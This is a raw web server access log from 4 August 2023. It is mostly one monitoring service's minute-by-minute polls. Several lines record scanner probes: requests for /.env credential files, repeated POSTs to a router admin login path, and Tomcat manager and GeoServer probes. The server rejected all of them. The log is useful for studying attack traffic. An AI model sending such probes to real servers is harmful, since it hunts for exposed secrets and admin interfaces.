212.91.246.72 - - [04/Aug/2023:11:11:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
78.38.182.113 - - [04/Aug/2023:11:12:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [04/Aug/2023:11:12:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:13:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:14:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:15:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:16:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:17:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.49.183.201 - - [04/Aug/2023:11:18:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [04/Aug/2023:11:18:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:19:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:20:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:21:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:22:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:23:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.74.196.239 - - [04/Aug/2023:11:24:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
109.74.196.239 - - [04/Aug/2023:11:24:02 +0200] "\x16\x03\x01" 501 318 "-" "-"
109.74.196.239 - - [04/Aug/2023:11:24:02 +0200] "\x16\x03\x01" 501 318 "-" "-"
109.74.196.239 - - [04/Aug/2023:11:24:02 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Aug/2023:11:24:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:25:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:26:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:27:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:28:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:29:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:30:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:31:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:32:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:33:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:34:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:35:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:36:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:37:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:38:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:39:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:40:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:41:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:42:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:43:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:44:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:45:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:46:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:47:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:48:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:49:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.35.18.253 - - [04/Aug/2023:11:50:35 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Aug/2023:11:50:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.88.246.20 - - [04/Aug/2023:11:51:38 +0200] "\x16\x03\x01" 501 318 "-" "-"
34.88.246.20 - - [04/Aug/2023:11:51:40 +0200] "OPTIONS / HTTP/1.0" 200 - "-" "-"
212.91.246.72 - - [04/Aug/2023:11:51:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.102.86.84 - - [04/Aug/2023:11:52:07 +0200] "\x16\x03\x01" 501 318 "-" "-"
34.102.86.84 - - [04/Aug/2023:11:52:11 +0200] "OPTIONS / HTTP/1.0" 200 - "-" "-"
212.91.246.72 - - [04/Aug/2023:11:52:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.241 - - [04/Aug/2023:11:53:35 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [04/Aug/2023:11:53:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.236.99.198 - - [04/Aug/2023:11:54:13 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.236.99.198 - - [04/Aug/2023:11:54:15 +0200] "OPTIONS / HTTP/1.0" 200 - "-" "-"
52.162.218.19 - - [04/Aug/2023:11:54:16 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
52.162.218.19 - - [04/Aug/2023:11:54:22 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
34.87.221.3 - - [04/Aug/2023:11:54:24 +0200] "\x16\x03\x01" 501 318 "-" "-"
34.87.221.3 - - [04/Aug/2023:11:54:27 +0200] "OPTIONS / HTTP/1.0" 200 - "-" "-"
212.91.246.72 - - [04/Aug/2023:11:54:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:55:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:56:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:11:57:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.132.87.128 - - [04/Aug/2023:11:58:23 +0200] "\x16\x03\x01" 501 318 "-" "-"
34.132.87.128 - - [04/Aug/2023:11:58:25 +0200] "OPTIONS / HTTP/1.0" 200 - "-" "-"
212.91.246.72 - - [04/Aug/2023:11:58:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.198.0.162 - - [04/Aug/2023:11:59:41 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.198.0.162 - - [04/Aug/2023:11:59:44 +0200] "OPTIONS / HTTP/1.0" 200 - "-" "-"
212.91.246.72 - - [04/Aug/2023:11:59:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.22.247.45 - - [04/Aug/2023:12:00:05 +0200] "\x16\x03\x01" 501 318 "-" "-"
34.22.247.45 - - [04/Aug/2023:12:00:07 +0200] "OPTIONS / HTTP/1.0" 200 - "-" "-"
212.91.246.72 - - [04/Aug/2023:12:00:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.139.141.113 - - [04/Aug/2023:12:01:00 +0200] "\x16\x03\x01" 501 318 "-" "-"
34.139.141.113 - - [04/Aug/2023:12:01:02 +0200] "OPTIONS / HTTP/1.0" 200 - "-" "-"
212.91.246.72 - - [04/Aug/2023:12:01:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:02:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.205.150.250 - - [04/Aug/2023:12:03:18 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.205.150.250 - - [04/Aug/2023:12:03:21 +0200] "OPTIONS / HTTP/1.0" 200 - "-" "-"
212.91.246.72 - - [04/Aug/2023:12:03:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:04:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.235.89.209 - - [04/Aug/2023:12:04:58 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.235.89.209 - - [04/Aug/2023:12:05:00 +0200] "OPTIONS / HTTP/1.0" 200 - "-" "-"
212.91.246.72 - - [04/Aug/2023:12:05:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:06:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:07:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.151 - - [04/Aug/2023:12:08:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0"
212.91.246.72 - - [04/Aug/2023:12:08:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.138 - - [04/Aug/2023:12:09:19 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.56"
212.91.246.72 - - [04/Aug/2023:12:09:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.138 - - [04/Aug/2023:12:09:59 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0"
212.91.246.72 - - [04/Aug/2023:12:10:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:11:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:12:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:13:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:14:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:15:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:16:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:17:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.35.18.253 - - [04/Aug/2023:12:18:41 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Aug/2023:12:18:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:19:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:20:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:21:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:22:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:23:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:24:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:25:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:26:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:27:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.130.57.239 - - [04/Aug/2023:12:28:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.64.1"
212.91.246.72 - - [04/Aug/2023:12:28:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:29:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:30:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:31:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:32:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:33:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:34:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.154.96.235 - - [04/Aug/2023:12:35:36 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36"
212.91.246.72 - - [04/Aug/2023:12:35:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:36:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:37:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:38:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:39:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
104.219.232.122 - - [04/Aug/2023:12:40:21 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Aug/2023:12:40:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
104.219.232.122 - - [04/Aug/2023:12:41:18 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 zgrab/0.x"
104.219.232.122 - - [04/Aug/2023:12:41:35 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 zgrab/0.x"
104.219.232.122 - - [04/Aug/2023:12:41:47 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Aug/2023:12:41:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
104.219.232.122 - - [04/Aug/2023:12:41:58 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 zgrab/0.x"
104.219.232.122 - - [04/Aug/2023:12:42:13 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Aug/2023:12:42:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:43:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:44:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:45:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:46:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:47:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:48:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.185.127.30 - - [04/Aug/2023:12:49:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
205.185.127.30 - - [04/Aug/2023:12:49:36 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
212.91.246.72 - - [04/Aug/2023:12:49:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
159.65.32.70 - - [04/Aug/2023:12:49:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
198.235.24.235 - - [04/Aug/2023:12:50:04 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Aug/2023:12:50:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:51:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:52:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:53:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.248.133.38 - - [04/Aug/2023:12:54:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.38 - - [04/Aug/2023:12:54:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.38 - - [04/Aug/2023:12:54:02 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.38 - - [04/Aug/2023:12:54:02 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [04/Aug/2023:12:54:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:55:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:56:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.92.130.94 - - [04/Aug/2023:12:57:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [04/Aug/2023:12:57:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:58:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:12:59:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.199.98.149 - - [04/Aug/2023:13:00:40 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
198.199.98.149 - - [04/Aug/2023:13:00:45 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Aug/2023:13:00:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.199.98.149 - - [04/Aug/2023:13:00:55 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
198.199.98.149 - - [04/Aug/2023:13:00:57 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
198.199.98.149 - - [04/Aug/2023:13:01:00 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
198.199.98.149 - - [04/Aug/2023:13:01:31 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
198.199.98.149 - - [04/Aug/2023:13:01:33 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
